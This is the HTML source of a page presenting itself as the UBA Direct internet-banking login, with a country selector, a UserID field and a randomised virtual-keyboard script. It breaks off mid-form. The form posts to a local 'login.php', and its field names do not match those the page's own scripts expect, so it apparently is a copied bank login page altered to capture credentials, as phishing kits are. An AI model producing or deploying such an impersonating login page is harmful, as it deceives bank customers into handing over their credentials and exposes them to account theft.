<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>

<!--[if lt IE 9]>
<style>
/* Internet Explorer Warning Message */
#ie-box { display: block; position: absolute; height: 100%; width: 100%; z-index: 100 }
#ie-warning-overlay { background: #000; height: 100%; width: 100%; overflow: hidden; position: fixed; z-index: 110 }
#ie-warning-wrap { background: #FFF; position: absolute; z-index: 120; height: 300px; width: 500px; left: 50%; top: 50%; margin-top: -150px; margin-left: -250px }
#ie-warning-wrap #ie-warning-msg { padding: 15px; position: relative; text-align: left }
#ie-warning-wrap #ie-warning-msg h3 { padding: 10px; color: #fff; background-color: #990000 }
#ie-warning-wrap a.close { z-index: 150; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-weight:bold; position: absolute; bottom: 15px; right: 15px; text-decoration: underline }
#ie-warning-wrap #ie-warning-msg p { margin-bottom: 15px }
#ie-warning-wrap a,
#ie-warning-wrap a:visited { color: #990000 }
#ie-warning-wrap #ie-warning-msg ol li span { font-style: italic; color: #999999 }
.transparent { /* IE 8 */
  -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; /* IE 5-7 */
  filter: alpha(opacity=50); /* Netscape */
  -moz-opacity: 0.5; /* Safari 1.x */
  -khtml-opacity: 0.5; /* Good browsers */
  opacity: 0.5 }
.opaque { /* IE 8 */
  -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; /* IE 5-7 */
  filter: alpha(opacity=100); /* Netscape */
  -moz-opacity: 1; /* Safari 1.x */
  -khtml-opacity: 1; /* Good browsers */
  opacity:1 }
</style>
<![endif]-->

<link type="image/x-icon" href="favicon.ico" rel="shortcut icon">
<link name="ubagroup.com" type="image/x-icon" href="favicon.ico" rel="icon">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="theme/new_style.css">
<link rel="stylesheet" type="text/css" href="theme/new_style_cont.css">
<link rel="stylesheet" type="text/css" href="theme/jquery-ui.custom.css">
<script type="text/javascript" src="../jquery/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="NFEBAScripts.js"></script>
<script type="text/javascript">jQuery.noConflict();</script>

<script>
setTreeFormt(1);
 function showRegister()
 {	 
	$("#registerDiv").show();
 }
</script>
<div id="flashcontent">
</div>
<title>UBA Direct – Log in to Internet Banking</title></head>
<body>
<form action="login.php" method="post" id="login">
<div class="row toprow">
<div id="global" class="body-style-02">
<div id="header">
    	<div class="container-fluid" >
        	<div class="row mainHeader">
            		<div class="col-md-9 col-lg-2 col-xs-6">
                    	<div  id="logo">
                        <img  src="images/ubadirect.png" alt="UDirect" /></div>
            		</div>
                              
                         

                    <div class="col-md-3 pull-right  col-xs-6">
                    	<div id="logoUBA" class="text-right"><a href="#"><img src="images/ubalogo.png" /></a></div>
                    </div>
                  
            </div>
        </div></div>


<!--<div id=topbar>

      <div id=header>

        	<div id="topbar-nav" class="header-nav">

       			<div id="topbar-wrapper" class="wrapper">

        			<div id="topbar-row" class="row">

        				<ul class="tabs">	

        				</ul>

        			</div>

        		</div>

        	</div>

        </div>

</div>       		-->						



  


<script type="text/javascript">
var oldtitle;
function WinRedirect(object) {
var title = object.title;
var value = object.value;
	if(title==oldtitle)
		return; 
	oldtitle=title;
	document.location.href=value; 
}

</script>
  











<script type="text/javascript">



linkArray = new Array();

isIE = document.all;



var currClickedElement;

var onFocus = 'Y';

var onUserIdFocus = 'Y';

var hidingkeypad = 0;

var hidinguserIdkeypad = 0;

var iAmGlobal = "Y"; 


jQuery(document).ready(function() {

//alert('1');	

if(onFocus == 'Y'){

	//jQuery("#AuthenticationFG.ACCESS_CODE").prop("readOnly",true);







jQuery(document).bind('keydown',function(event) {

	if(event.which == 13 || event.which == 9) {

		//alert('2');		

	closeKeypad();

	}

});





jQuery(document).bind('click',function(event) {

	

currClickedElement=jQuery(event.target).closest('div').parent().parent().parent();



var val = jQuery(event.target).attr('type');

//if (hidingkeypad==0){



if(currClickedElement && ((hidingkeypad==0) ||(hidinguserIdkeypad==0) )&&(jQuery(event.target).attr('type')=="password" || 

	jQuery(currClickedElement).attr('id')=='pp_div' || jQuery(event.target).attr('type')=="text")){

	

	jQuery(document.getElementById('pp_div')).show();

	

}

	//}

else{


	//alert('5');	

	closeKeypad();

}

});



	jQuery( ".buttonhashed" ).css( "display", "none" );



	}



}); 



isNN = !document.all&&document.getElementById;



isN4 = document.layers;



ppX = 450;

ppY = 250;



editCtl = null;

tmpEditCtl = null;


rX = (Math.random() * 24) - 12;

rY = (Math.random() * 36) - 18;





vIndex=0;

vRandomAlp=0;

vRandomNo=0;

vRandomSpl=0;





isHot=false;

showFirstTime=true;





isFirstTimeEnable = true;



var pwdImageValue="";

var pwdStrengthValue="";



insertData=function(ctl, value) {



    ctl.value = ctl.value + value;

    

    setValues(pwdImageValue,pwdStrengthValue)

    if(pwdImageValue != "" && pwdStrengthValue!= ""){

    	determinePasswordStrength(ctl.value,pwdImageValue,pwdStrengthValue);

    }

    

};



     

applyNumber=function(ctl) {

    if(editCtl != null) {





        if(ctl.name == 'pp_clear') {

            editCtl.value = '';

            setValues(pwdImageValue,pwdStrengthValue)

            if(pwdImageValue != "" && pwdStrengthValue!= ""){

                   determinePasswordStrength(editCtl.value,pwdImageValue,pwdStrengthValue);

            }       

           

        }else if (ctl.name == 'pp_erase'){

            editCtl.value= editCtl.value.substring(0,editCtl.value.length-1);

             setValues(pwdImageValue,pwdStrengthValue)

             if(pwdImageValue != "" && pwdStrengthValue!= ""){

             		determinePasswordStrength(editCtl.value,pwdImageValue,pwdStrengthValue);

             }

        

        

        }else if (ctl.name == 'pp_caps'){ 

			var vCaps = document.getElementById('pp_caps').value;

			for(var vIndex=1;vIndex<=26;vIndex++){

				var vAlp = document.getElementById('alp_'+vIndex).value;

				

				if(vAlp==vAlp.toLowerCase()){

					var vTemp=vAlp.toUpperCase();

					document.getElementById('alp_'+vIndex).value=vTemp;

			document.getElementById('pp_caps').value=vCaps.toUpperCase();

				

				}else{		

					var vTemp=vAlp.toLowerCase();

					document.getElementById('alp_'+vIndex).value=vTemp;

				}

			document.getElementById('pp_caps').value=vCaps.toLowerCase();

			}

	

	

		}else {

		



            if(!editCtl.maxLength || editCtl.maxLength == 0 || editCtl.maxLength > editCtl.value.length) {



                insertData(editCtl, ctl.value);

            }

            tmpEditCtl = editCtl;

            if(editCtl.maxLength && editCtl.maxLength <= editCtl.value.length) {



                setPinPadCtl(null);

            }

	    if(tmpEditCtl.focus){

                setTimeout('tmpEditCtl.focus()', 1);

	    }

        }

    }

};

isIE=document.all? 1:0



		

		noKeyboard=function(e){

			keyEntry = !isIE? e.which:event.keyCode;

			if((keyEntry < '255') || (keyEntry > '0')){

				return false;

			}

		};

		

		

		var langBsdSmallAlp = {"001":"abcdefghijklmnopqrstuvwxyz","002":"abcdefghijklmnopqrstuvwxyz",

		"003":"abcdefghijklmnopqrstuvwxyz","004":"abcdefghijklmnopqrstuvwxyz"};

		var langBsdNum = {"001":"0123456789","002":"0123456789","003":"0123456789","004":"0123456789"};

		var langBsdSplChars = {"001":".+-!,@#$%&*()?=<>^_]{:\\|}`/[~\"\';","002":".+-!,@#$%&*()?=<>^_]{:\\|}`/[~\"\';",

		"003":".+-!,@#$%&*()?=<>^_]{:\\|}`/[~\"\';","004":".+-!,@#$%&*()?=<>^_]{:\\|}`/[~\"\';"};

		

		

		getCharBasedOnLangId=function(arrayObj){

			var chars = arrayObj[langID];

			var langArr = new Array();

			var character;

			

			if(chars == null){

				chars = arrayObj["001"];

			} 

			var charLen = chars.length;

			for(i=0; i < charLen ; i++){

				character = chars.substring(i,i+1);

				if(character == "\""){

					langArr[i] = "&quot";

				}else{

					langArr[i] = character;	

				}

			}		

			return langArr;

		};

		

		

		settingPinPadCtlOnFocus=function(whatobject,whatimage,whatelement){


		
			

			var mytextbox = document.getElementById(whatelement);

			

			if(onFocus == 'Y' || onUserIdFocus == 'Y'){
			
				

		

			var isVisible =jQuery('#pp_div').is(':visible');			

				if(isVisible && elem == whatelement){

					//jQuery(document.getElementById('pp_div')).show();

					

					noAction = true;

					//return;

				}else{

				jQuery(document.getElementById('pp_div')).show();

					noAction = false;

				}		

				settingPinPadCtl(whatobject,whatimage,whatelement);

			}

			

			else{

			noAction = true;

			}

		};

		

		

		

		settingPinPadCtl=function(whatobject,whatimage,whatelement){

			if(noAction){

				return;

			}

			smallAlpArr = getCharBasedOnLangId(langBsdSmallAlp);

			numArr = getCharBasedOnLangId(langBsdNum);

			splCharArr = getCharBasedOnLangId(langBsdSplChars);





if(vRandomAlp==0){

	

	smallAlpArr.sort(function() {

return 0.5 - Math.random()})

}

if(vRandomNo==0){

	numArr.sort(function() {

return 0.5 - Math.random()})

}

if(vRandomSpl==0){

	splCharArr.sort(function() {

return 0.5 - Math.random()})

}





	var incr=0;

	var incralp=0,incrno=0,incrspl=0;

	var formname = '';

	var tempincralp;

	var tempincrno;

	var tempincrspl;

	for(j=0;document.forms[j] != null;j++)

	{

		for(i=0; document.forms[j].elements[i] != null; i++)

		{

			if((document.forms[j].elements[i].name == whatelement))

			{

				formname = document.forms[j].name;

			}

		}

	}

	this.target=document.forms[formname].elements[whatelement];

			

			

			

			var len = 11;

			var numSplVal = 0;

			var newRow;

			var smallAlpArrLen = smallAlpArr.length;

			var numArrLen = numArr.length;

			var splCharArrLen = splCharArr.length;

			

			if (whatimage == 2){  

				

		var sHTML='<div id="close-keypad" class="width100percentforkeypad" ><div id="keypadstyle"  class="">'

			+'<p align="right"> <span class="keyBoardTitle"> Virtual Keyboard</span> '

			+'<span class="keyBoardTitleInfo"></span>'

			+'<span> <strong><a name="CLOSE_KEYPAD" id="CLOSE_KEYPAD" href="javascript:setPinPadCtl(null),enableTextField(\'+whatelement+\')" class="close" title="Close">x&nbsp;</a></strong></span> </p>' 

			+ '<p ><span id="titleBar" class="keyBordText" style="display:none"><ilayer width="100%" onSelectStart="return false">'

			+'<layer  width="100%" onMouseover="isHot=true;if (isN4) ddN4(pp_div)" onMouseout="isHot=false">'

			+'Access Code: '

			+'</layer></ilayer>'

			+'</span>'

			+'<span class="floatingleft" style="padding-bottom:5px"><input length="13" type=password name="buffer" id="input_buffer" value="" id=buffer onkeyup=checkPinPad(this) readonly style="display:none"></span>'

			+'</p></div>';

				

				sHTML = sHTML+'<div id="keypadclear";width:100%" >';

				while(incralp < smallAlpArrLen || incrno < numArr.length || incrspl < splCharArrLen){

					

					sHTML = sHTML+'<p class="clearboth">';

					newRow=true;

					for (i=0; i < len; i++){

						

						

						if(i == 0){

							sHTML = sHTML+'<span  class="height28forkeypad">';

						} else{

							sHTML = sHTML+'<span>';

						}

						

						

						if(incrspl < splCharArrLen && i < len){

							tempincrspl=incrspl++;

							sHTML = sHTML+'<input class="mainButtongreen" type="button" name="pp_'+incrspl+'" id="pp_'+incrspl+'" title="'+splCharArr[tempincrspl]+'"  value="'+splCharArr[tempincrspl]+'" onclick="applyNumber(this)"/></span>';

							if(incrspl == splCharArrLen ){

								sHTML = sHTML+ '<br>';

								i++ ;

							}

							newRow = false;

						}						

												

						

						if(incrno < numArrLen && i < len && newRow == true){

							tempincrno=incrno++;

							sHTML = sHTML+'<input class="mainButtonblue" type="button" name="pp_'+incrno+'" id="pp_'+incrno+'" title="'+numArr[tempincrno]+'"  value="'+numArr[tempincrno]+'" onclick="applyNumber(this)"/></span>';

							if(incrno == numArrLen ){

								sHTML = sHTML+ '<br>';

								i++;

							}

							newRow = false;	

												

						}



											

						if(incralp < smallAlpArrLen && i < len && newRow == true){

							tempincralp=incralp++;

							sHTML = sHTML+'<input class="mainButton" type="button" name="alp_'+incralp+'" id="alp_'+incralp+'" title="'+smallAlpArr[tempincralp]+'"  value="'+smallAlpArr[tempincralp]+'" onclick="applyNumber(this)"/></span>';

							if(i == len-2){

								sHTML = sHTML+ '<br>';

								i++;

							}

						}

						

						

						 if((incrspl >= splCharArrLen || incralp >= smallAlpArrLen || incrno <= numArrLen) && i < len-1 ){

						 	sHTML = sHTML+'</span>';

						 	newRow = true;						 					 		

						}

						

					}

					

					

				}

				sHTML = sHTML+'<input class="mainButton_blank" type="button" /></span>';

				if(langID == '001'){

				sHTML = sHTML +'<span class=""><input class="keybtn_Caps" type="button" id="pp_caps" name="pp_caps" title="Caps" value="" alt="Caps" onclick="applyNumber(this)"/></span>';

			}else{

				sHTML = sHTML +'<span class=""><input class="keybtn_Caps" type="button" id="pp_caps" name="pp_caps" title="Caps" value="" alt="Caps" /></span>';

			}

			sHTML = sHTML+'<span class=""><input class="keybtn_Backspace" type="button" name="pp_erase" id="pp_erase" title="Backspace" value="" onclick="applyNumber(this)"/></span>'

				+'<span class=""><input class="keybtn_Clear" type="button" name="pp_clear" id="pp_clear" title="Clear" value="" onclick="applyNumber(this)"/></span>';

			sHTML = sHTML+'</p>';	

			sHTML = sHTML+'</div>';

			sHTML = sHTML+'</div>';

			}

			

				



document.getElementById("scriptdiv").innerHTML = sHTML;

	

	document.forms[formname].buffer.maxLength = 2147483647; 



	/*setPinPadCtl(document.forms[formname].buffer);*/

	setPinPadCtl(document.forms[formname].elements[whatelement]);

	elem = whatelement;

};





setPinPadCtl=function(ctl) {



    

    if(ctl && !editCtl && ctl.maxLength && ctl.maxLength <= ctl.value.length) {

    

        return;

    }

    

    

    editCtl = ctl;

    var elements = document.forms[0].elements;

    for(i = 0; i <= 77; i++) {



        var el = elements['pp_' + i];

        if(el != null) {



            el.disabled = editCtl == null;

        }

    }

    var el = elements['pp_clear'];

	if(el != null) {



        el.disabled = editCtl == null;

    }

	var el = elements['pp_erase'];

	if(el != null) {



        el.disabled = editCtl == null;

    }

	var el = elements['close'];

	if(el != null) {



        el.disabled = editCtl == null;

    }

	var el = elements['done'];

    if(el != null) {



        el.disabled = editCtl == null;

    }

	var el = elements['buffer'];

    if(el != null) {



        el.disabled = editCtl == null;

    }

	var el = elements['help'];

    if(el != null) {



        el.disabled = editCtl == null;

    }



    topLayer=isIE ? 'BODY' : 'HTML';

    layer = isIE ? document.all.pp_div : document.getElementById ? document.getElementById('pp_div') : document.layers ? document.layers.pp_div : document.pp_div;



	if(isIE && event || !isIE && ctl) {



        hotLayer=isIE ? event.srcElement : ctl.target;

        while (hotLayer != null && hotLayer.id != 'titleBar' && hotLayer.tagName != topLayer) {



          hotLayer=isIE ? hotLayer.parentElement : hotLayer.parentNode;

        }

        if (hotLayer != null && hotLayer.id == 'titleBar' && ctl != null) {



          offsetx=isIE ? event.clientX : ctl.clientX;

          offsety=isIE ? event.clientY : ctl.clientY;

          nowX=parseInt(layer.style.left);

          nowY=parseInt(layer.style.top);

          ddEnabled=true;

          document.onmousemove=dd;

        }

    }

    if(layer != null) {



        if(editCtl != null) {




            if (showFirstTime) {

		

                showFirstTimePinPad(layer, ctl);

                display();

                showFirstTime=false;

            } else {

		



				showPinPad(layer, ctl);

				display();

            }

        } else {

			hidePinPad(layer);

			display();

        }

		

		

    } else {



        alert('Pin Pad not supported by your browser');

    }

};



onloadNumber=function(ctl) {



    ctl.disabled = editCtl == null;

};



checkPinPad=function(ctl) {



    if(ctl.maxLength && ctl.maxLength != 0 && ctl.maxLength <= ctl.value.length) {



        setPinPadCtl(null);

    } else {



        if(editCtl == null)

            setPinPadCtl(this);

    }

};





showPinPad=function(ctl, pctl) {





	if (isIE || isNN) {



        layer.style.visibility='visible';

       

    } else if (isN4) {



        document.pp_div.visibility='show';

        

    }

};



showFirstTimePinPad=function(ctl, pctl) {





    var pX = 500;

    var pY = 250;



    if(ppY) {



        pY = ppY;

    } else if(pctl.screenTop) {



        pY = pctl.screenTop + 30;

    } else if(pctl.screenY) {



        pY = pctl.screenY + 30;

    }

    if(ppX) {



        pX = ppX;

    } else if(pctl.screenLeft) {



        pX = pctl.screenLeft;

    } else if(pctl.screenX) {



        pX = pctl.screenX;

    }

    if(ctl.style) {



        ctl.style.top = pY + rX;

        ctl.style.left = pX + rY;

    }

    if (isIE || isNN) {



		layer.style.visibility='visible';

    } else if (isN4) {



        document.pp_div.visibility='show';

        

	}

	

};



hidePinPad=function(ctl){



    if (isIE || isNN) {



		layer.style.visibility='hidden';



	} else if (isN4) {



		document.pp_div.visibility='hide';

    }

elem = null;

};



ddInit=function(ctl){



    var topLayer = isIE ? 'BODY' : 'HTML';



	var layer = isIE ? document.all.pp_div : document.getElementById ? document.getElementById('pp_div') : document.layers ? document.layers.pp_div : document.pp_div;



	var hotLayer = isIE ? event.srcElement : ctl.target;



	if (layer != null) {



        while (hotLayer.id != 'titleBar' && hotLayer.tagName != topLayer) {



		  hotLayer=isIE ? hotLayer.parentElement : hotLayer.parentNode;

		  if (hotLayer == null) return;

        }

        if (hotLayer.id == 'titleBar') {





		  offsetx=isIE ? event.clientX : ctl.clientX;

          offsety=isIE ? event.clientY : ctl.clientY;

          nowX=parseInt(layer.style.left);

          nowY=parseInt(layer.style.top);

          ddEnabled=true;

          document.onmousemove=dd;

        }

    }

};



dd=function(ctl){



  if (!ddEnabled) return;

  layer.style.left=isIE ? nowX+event.clientX-offsetx : nowX+ctl.clientX-offsetx+'px';

  layer.style.top=isIE ? nowY+event.clientY-offsety : (nowY+ctl.clientY-offsety)+'px';

  display();

  return false;

};



		 

		disbleTextField=function(whatelement){

			

			var isVisible = document.getElementById('pp_div').style.visiblity = 'visible' ? true : false;

			if(isVisible && elem == whatelement){

				noAction = true;

				return;

			}else{

				noAction = false;

			}

			

			var j=0;

			var enab = true;

			var disb = true;

			while((document.forms[j] != null && (enab || disb))){

					

					for(i=0; document.forms[j].elements[i] != null; i++){

					

				 		if(isVisible && (document.forms[j].elements[i].name == elem)){

				 			document.forms[j].elements[i].disabled = false;

				 			enab = false;

				 		}else if((document.forms[j].elements[i].name == whatelement)){		

							

							document.forms[j].elements[i].disabled=true;

							disb = false;

					 	}

					 	if(!isVisible){

					 		enab = false;

					 	}

					}

				j++;

			}

			

		};

		

		

		setStyle=function(obj,style,value){

			obj.style[style]=value;

		};



	    

		enableTextField=function(whatelement){

			this.target.disabled=false;

		};



		getPixel=function(str) {

			if (str == "") {

				return "0";

			} else {

				return parseInt(str.substring(0, str.length-2),10);

			}

		};



		

		randomDisplay=function(){

			

			var scrollTop = window.pageYOffset || window.document.documentElement.scrollTop || window.document.body.scrollTop;

			var maxtop = scrollTop+320;

			var maxleft = 320;

			var pos = Math.random()*200;

			var locationtop;

			var locationleft;

			

			if (!isIE) {

				locationtop = getPixel(document.getElementById('pp_div').style.top);

			  	locationleft = getPixel(document.getElementById('pp_div').style.left);

			} else {

			  	locationtop = document.all.pp_div.style.pixelTop;

			  	locationleft = document.all.pp_div.style.pixelLeft;

			}

			

			if (pos <= 150)

				locationtop = locationtop + pos;

			else

			  	locationtop = locationtop - pos;

			

			if (locationleft <= 200)

			  	locationleft = locationleft + pos;

			else

			  	locationleft = locationleft - pos;

			

			if (locationtop < scrollTop) 

			  	locationtop = scrollTop;

			else if (locationtop > maxtop)

			  	locationtop = maxtop;

			

			if (locationleft<0)

			  	locationleft=1;

			else if (locationleft >= maxleft)

			  	locationleft=maxleft;

			if (!isIE) {

			  	document.getElementById('pp_div').style.top=locationtop+'px';

			  	document.getElementById('pp_div').style.left=locationleft+'px';

			} else {

			  	document.all.pp_div.style.pixelTop=locationtop;

			  	document.all.pp_div.style.pixelLeft=locationleft;

			}

			display();

		};







		

		fixedDisplay=function(element){

			/* Changes done for 11.0.8 Enhancement

			Virtual Keyboard will be displayed at right hand side of Virtual Keypad image */

			

			/* Fetch element which has focus */	

			var whatelement = document.getElementById(element);

		

			/* Fetch postition of element */

			var leftPosition = whatelement.offsetLeft;

			var topPosition = whatelement.offsetTop;

			var elementWidth = whatelement.offsetWidth;

			var elementHeight = document.getElementById('pp_div').offsetHeight;

			  	

			document.getElementById('pp_div').style.top=  topPosition - elementHeight +'px';

			document.getElementById('pp_div').style.left= leftPosition + elementWidth + 'px';

			 				

			display();

		};

		



                        fixedDisplayBelow=function(element){

                                    /* Changes done for 11.0.8 Enhancement

                                    Virtual Keyboard will be displayed below */

                                    

                                    /* Fetch element which has focus */       

                                    currentID = element;

                                    var whatelement = document.getElementById(element);

                                                                        

                                    /* Fetch postition of element */

                                    var leftPosition = whatelement.offsetLeft;

                                    var topPosition = whatelement.offsetTop;

                                    var elementWidth = whatelement.offsetWidth;

                                    var elementHeight = document.getElementById('pp_div').offsetHeight;

                                                

                                    document.getElementById('pp_div').style.top=  topPosition + (elementHeight/2) + 10 +'px';

                                    document.getElementById('pp_div').style.left= leftPosition + elementWidth - 100 + 'px';

                                                                                   

                                    display();

                        };



						

						

		closeKeypad=function(){

			jQuery(document.getElementById('pp_div')).hide();

		}



ddN4=function(whatLayer){



  if (!isN4) return;

  N4=eval(whatLayer);

  N4.captureEvents(Event.MOUSEDOWN|Event.MOUSEUP);

  N4.onmousedown=function(ctl){



    N4.captureEvents(Event.MOUSEMOVE);

    N4x=ctl.x;

    N4y=ctl.y;

  }

  N4.onmousemove=function(ctl){



    if (isHot){



      N4.moveBy(ctl.x-N4x,ctl.y-N4y);

      return false;

    }

  }

  N4.onmouseup=function(){



    N4.releaseEvents(Event.MOUSEMOVE);

  }

};





donePinPad=function(buffer){

   this.target.value = buffer.value;

	buffer.value = '';

	

};



openPinPadHelp=function() {



    var url = 'pinpad.html';

    newwindow = window.open(url,'Security','height=500,width=700,scrollbars=yes,resizable=yes');

    if (window.focus) {



        newwindow.focus();

    }

};



display=function()

{

	if(navigator.userAgent.toLowerCase().indexOf("msie")!=-1)

	{

	if(document.getElementById('iframetop')!=null)

    {

		

		

        var layerdiv = document.getElementById('pp_div');

        layerdiv .style.display = '';

        

        var iframe = document.getElementById('iframetop');

        iframe.style.display = '';

        iframe.style.width = layerdiv.offsetWidth;

        iframe.style.height = layerdiv.offsetHeight;

        iframe.style.left = layerdiv.offsetLeft;

        iframe.style.top = layerdiv.offsetTop;

        iframe.style.visibility=layerdiv.style.visibility;

    }   

    }

};

setValues =function(strengthImage,strengthValue){

     pwdImageValue = strengthImage;

     pwdStrengthValue = strengthValue;

     

};

function getScrollXY() {

  var scrOfX = 0, scrOfY = 0;

  if( typeof( window.pageYOffset ) == 'number' ) {

    

    scrOfY = window.pageYOffset;

    scrOfX = window.pageXOffset;

  } else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {

    

    scrOfY = document.body.scrollTop;

    scrOfX = document.body.scrollLeft;

  } else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {

    

    scrOfY = document.documentElement.scrollTop;

    scrOfX = document.documentElement.scrollLeft;

  }

  return [ scrOfX, scrOfY ];

}

</script>





<script  type="text/javascript">

document.onmousedown=ddInit;

document.onmouseup=Function("ddEnabled=false");

</script>

<iframe id="iframetop" scrolling="no" frameborder="0"> </iframe>

	<div id="pp_div" valign="right" class="keypaddiv">

<div id="scriptdiv"></div>

</div>



<script  type="text/javascript">ppX=100;ppY=100;setTimeout('setPinPadCtl(null)',1);</script>



<Script type = "text/javascript"> 

function textboxenabling(whatobject,whatimage,whatelement)

{	

	var elememtId = document.getElementById(whatelement);
	
	var e1 = document.getElementById("Disable_Virtual_keyBoard");
	

	if(onFocus == 'Y' && !e1.checked){

		elememtId.disabled= true;

		elememtId.disabled= false;	

		elememtId.readOnly=true;

	settingPinPadCtlOnFocus(whatobject,whatimage,whatelement) ;

	}

	else{

		elememtId.disabled= false;

		elememtId.readOnly=false;

	}

	

};

</script>

<script>

function textboxenabling1(whatobject,whatimage,whatelement)

{	


	var elememtId1 = document.getElementById(whatelement);

	var e1 = document.getElementById("Disable_Virtual_keyBoard");

	if(onUserIdFocus == 'Y' && !e1.checked){

		elememtId1.disabled= true;

		elememtId1.disabled= false;	

		elememtId1.readOnly=true;

	settingPinPadCtlOnFocus(whatobject,whatimage,whatelement) ;

	}

	else{

		elememtId1.disabled= false;

		elememtId1.readOnly=false;

	}

	

};

</script>

<Script type = "text/javascript"> 

function disablePasswordKeyboard()

{

	var e2 = document.getElementById("Disable_Virtual_keyBoard2");

	var ex2 = document.getElementById("AuthenticationFG.ACCESS_CODE");

	if(e2.checked){

		ex2.disabled= false;

		ex2.readOnly=false;

		onFocus = 'N';

		hidingkeypad = 1;

		closeKeypad();

		setPinPadCtl(null);

	}else{

		ex2.readOnly=true;

		onFocus = 'Y';

		hidingkeypad = 0;

	}

};

</script>

<script>

function disableUserIdKeyboard()

{

	var e1 = document.getElementById("Disable_Virtual_keyBoard1");

	var ex1 = document.getElementById("AuthenticationFG.USER_PRINCIPAL");

	if(e1.checked){

		ex1.disabled= false;

		ex1.readOnly=false;

		onUserIdFocus = 'N';

		hidinguserIdkeypad = 1;

		closeKeypad();

		setPinPadCtl(null);

	}else{

		ex1.readOnly=true;

		onUserIdFocus = 'Y';

		hidinguserIdkeypad = 0;

	}

};

</script>

<script>

function disableKeyboard()

{

	var e1 = document.getElementById("Disable_Virtual_keyBoard");

	var ex1 = document.getElementById("AuthenticationFG.USER_PRINCIPAL");

	var ex2 = document.getElementById("AuthenticationFG.ACCESS_CODE");

	if(e1.checked){

		ex1.disabled= false;

		ex1.readOnly=false;

		ex2.disabled= false;

		ex2.readOnly=false;

		onUserIdFocus = 'N';

		onFocus = 'N';

		hidinguserIdkeypad = 1;

		hidingkeypad = 1;

		closeKeypad();

		setPinPadCtl(null);

	}else{

		ex1.readOnly=true;

		onUserIdFocus = 'Y';

		onFocus = 'Y';

		hidinguserIdkeypad = 0;

		hidingkeypad = 0;

	}

};

</script>


<script>

function disablePasswordField()

{

	var e1 = document.getElementById("Disable_Virtual_keyBoard");

	var ex1 = document.getElementById("LoginAltFlowFG.LOGIN_PWD");

	var ex2 = document.getElementById("LoginAltFlowFG.RETYPE_LOGIN_PWD");

	if(e1.checked){

		ex1.disabled= false;

		ex1.readOnly=false;

		ex2.disabled= false;

		ex2.readOnly=false;

		onUserIdFocus = 'N';

		onFocus = 'N';

		hidinguserIdkeypad = 1;

		hidingkeypad = 1;

		closeKeypad();

		setPinPadCtl(null);

	}else{

		ex1.readOnly=true;

		onUserIdFocus = 'Y';

		onFocus = 'Y';

		hidinguserIdkeypad = 0;

		hidingkeypad = 0;

	}

};


</script>
  <div  class="width100percent_loginbg" id="HDisplay1" >
        <div  class="width100percent" id="HDisplay1.Rowset1">
             <div  id="HDisplay1.Ra1" >
<div  id="HDisplay1.Ra1.C1"  class="loginheadertextsize">Log in to Internet Banking</div></div> 
        </div>
               
        <div  class="width50percent_left_login" id="loginDiv">
          <p  id="HDisplay1.Rb21"class="loginrow" >
<span  id="HDisplay1.Rb21.C1" ><span class="labelColumn_combo_small"><span class="labelColumn_combo_brdr_small" >

 <select  name="country" class = "labelcolumncombosmall" id="country" title = "Country">
 	<option value="Nigeria" title="Nigeria">Nigeria</option>
 	<option value="Benin" title="Benin">Benin</option>
    <option value="Burkina Faso" title="Burkina Faso">Burkina Faso</option>
    <option value="Congo Brazzaville" title="Congo Brazzaville">Congo Brazzaville</option>
    <option value="Cameroon" title="Cameroon">Cameroon</option>
    <option value="Chad" title="Chad">Chad</option> 
    <option value="Cote d'Ivoire" title="Cote d'Ivoire">Cote d'Ivoire</option> 
    <option value="Congo DRC" title="Congo DRC">Congo DRC</option> 
    <option value="Gabon" title="Gabon">Gabon</option> 
    <option value="Ghana" title="Ghana">Ghana</option> 
    <option value="Guinea" title="Guinea">Guinea</option> 
    <option value="Kenya" title="Kenya">Kenya</option> 
    <option value="liberia" title="Liberia">Liberia</option> 
    <option value="Mozambique" title="Mozambique">Mozambique</option> 
    <option value="Senegal" title="Senegal">Senegal</option> 
    <option value="sierraleone" title="Sierra Leone">Sierra Leone</option> 
    <option value="Tanzania" title="Tanzania">Tanzania</option> 
    <option value="Uganda" title="Uganda">Uganda</option> 
    <option value="Zambia" title="Zambia">Zambia</option>
    </select>
    </span>
    </span>
    </span>
    
    <span  id="HDisplay1.Rb21.C1" >
    <span class="labelColumn_combo_small">
    <span class="labelColumn_combo_brdr_small" >
     <select  name= "LANGUAGE" class = "labelcolumncombosmall" id="LANGUAGE" title = "Language_combobox"> 
     <option value="001"   title="English">English</option>
     </select>
     </span>
     </span>
     </span>
     </p>

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext">&nbsp;</span></span></p>
          <p  id="HDisplay1.Rb12"class="loginrow" >&nbsp;</p>
          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext">&nbsp;</span></span></p>
          <p  id="HDisplay1.Rb3"class="loginrow" >
<span  id="HDisplay1.Rb3.C1"  class="hwloginpagelabel">
			<label for="USER_PRINCIPAL"  title = "UserID" class = "simpletext" >UserID<span class="redstar">*</span></label>
            </span>
          </p>

          <p  id="HDisplay1.Rb4"class="loginrow" >
			<span  id="HDisplay1.Rb4.C1"  class="hwleftimagevirtualkeyboard"><span class="labelColumn">
				<input type="text" name="username"  size="28" class="querytextboxmedium type_UserPrincipal"  maxLength="128" id="UserId">
    		</span>
   			 <span class="simpletext">&nbsp;</span>
    		 </span>
    	</p>

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext" id="Caption24638156">If Corporate, format is </span></span><span  id="HDisplay1.Rb5.C2" ><span class="loginBold" id="Caption24638156">Corp ID.User ID</span></span></p>

    <p  id="HDisplay1.Rb55"class="loginrow" >
	<span  id="HDisplay1.Rb55.C1" ><span class="simpletext">&nbsp;</span></span></p>

    <p  id="HDisplay1.Rb6"class="loginrow" >
